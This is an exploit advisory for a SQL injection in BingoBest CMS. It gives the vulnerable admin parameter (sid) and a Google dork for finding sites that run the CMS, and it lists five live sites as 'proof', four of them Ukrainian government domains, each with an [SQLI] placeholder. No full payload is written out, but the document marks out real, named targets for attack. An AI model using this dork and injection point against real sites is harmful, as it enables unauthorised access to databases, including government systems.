*=============================================================|
*-------------------In The Name Of God------------------------|
|
| Exploit Title : BingoBest Cms Sql Injection
|
| Exploit Author : Ashiyane Digital Security Team
|
| Vendor Homepage : http://bingobest.biz/
|
| Google Dork : intext:© BingoBest - розробка сайтів та програмного забезпечення
|
| Tested on : Windows 10 ~~~> Google Chrome
|
| Date : 1/30/2017
*==========================================================|
|
| vulnerability Path : http://target/Path/admin/index.php?dm=1&sid=
|
*==========================================================|
| Proof :
|
| http://bingobest.biz/admin/index.php?dm=1&sid=[SQLI]
|
| http://bgadmin.gov.ua/admin/index.php?dm=1&sid=[SQLI]
|
| http://rdatf.gov.ua/admin/index.php?dm=1&sid=[SQLI]
|
| http://kodis.chuguev-rada.gov.ua/admin/index.php?dm=1&sid=[SQLI]
|
| http://shevselrada.gov.ua/admin/index.php?dm=1&sid=[SQLI]
|
*=============================================================|
| Discovered By : HackFans
*=============================================================|